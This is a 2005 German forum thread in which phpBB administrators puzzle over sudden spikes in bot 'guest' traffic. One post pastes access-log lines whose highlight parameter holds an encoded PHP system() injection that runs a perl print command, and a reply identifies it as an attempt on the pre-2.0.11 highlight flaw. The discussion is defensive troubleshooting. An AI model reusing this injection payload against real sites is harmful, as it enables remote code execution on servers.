"lesbians"-Spam-Attacke

[stei109]

spass beiseite: wie soll man gastzugriffe von bots unterbinden solange es kein definiertes merkmal gibt, dass sie von normalen gastzugriffen (die in aller regel ja wohl erlaubt sein sollen) unterscheidet?

Hi!
Kann man wohl nicht unterbinden, aber warum sollen Gastzugriffe in aller Regel erlaubt sein ?
Hatte ich bis dato auch, aber ich lass mir mein Forum nicht zuspammen und mißbrauchen - also bleibt nur mehr der weg über die Registrierung.
Das hält solche Idioten fürs erste ab.

[niffi]

ich sagte logfiles (und nichts statistik)
erklär' mir aber bitte aber auch noch einmal genau, was du eigentlich erreichen willst.

also: mein websitecounterzeigt an das in etwa 10 minuten ca. 20 leute zugegriffen haben, in der gleichen zeit schwankt aber die zahl der gäste im forum zwischen 30 und 70 (!) und das ständig. ist aber erst seid 2 tagen so. gut ich hatte vorher "acid´s whos online" hack nicht drauf, aber selbst wenn ich die seite in den zustand davor zurückversetze, tritt der fehler auf.

ist einfach unwahrscheinlich das pötzlich 40 oder 50 gäste städnig online sind, wo frühr max. mit regUsern nur 20 da waren.

Und wenn ich als Admin mir die IPs ansehe, sind auch einige doppelt (meist taucht die gleiche IP 2 oder 3 mal auf)...

[DocSnyder]

Ich habe jetzt logfiles. Leider kann ich damit nicht soviel anfangen.
Aber komisch siehts aus

Code: Alles auswählen

216.55.xxx.xx - - [18/Feb/2005:13:11:01 +0100] "GET 
/viewtopic.php?t=2769&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252
Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(3
4)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr
(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%
252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 
302 - "-" "Mozilla/4.0"

212.18.xx.x - - [18/Feb/2005:13:11:03 +0100] "GET 
/viewtopic.php?t=2739&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252
Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(3
4)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr
(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%
252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 
86202 "-" "Mozilla/4.0"

212.18.xx.xxx - - [18/Feb/2005:13:11:16 +0100] "GET 
/viewtopic.php?p=125048&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%2
52Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr
(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Ec
hr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111
)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 
200 87382 "-" "Mozilla/4.0"

[niffi]

ja hilft mir leider nicht richtig weiter....

[701]

habe seit ca. 7 Uhr auch massives "Gastaufkommen" wobei die stosszeiten bei 81 Usern lag, jedoch keine schäden oder minderung der Serverleistung.

[larsneo]

Code: Alles auswählen

highlight=%2527

ist der versuch, die pre-2.0.11 schwachstelle auszunutzen. bei aktuellen boards passiert dadurch definitiv nichts. als zusätzlichen schutz vor traffic habe ich *hier* schon vor geraumer zeit eine .htaccess gepostet.

[niffi]

so, 16:14 Uhr -> seit etwa 30 min hat sich es bei mir wieder eingepegelt auf 8-10 Gäste.... ist bei mir normal.

wer weiß was da loswar......

was soll das ändern der .htaccess bringen?

@701: ich hab heute mit 78 Usern auch nen neuen rekord aufgestellt....

[stei109]

Was da genau abläuft, weiß ich auch nicht (hätte den Link im betreffenden Posting doch speichern sollen.)
Fakt ist, dass genau auf den Forumseintrag verlinkt wird und das die "Besucher" dorthin zieht.
Was das soll, weiß ich auch nicht

[larsneo]

was soll das ändern der .htaccess bringen?

als zusätzlichen schutz vor traffic[...]

[niffi]

den link zu finden, sollte eine herausforderung sein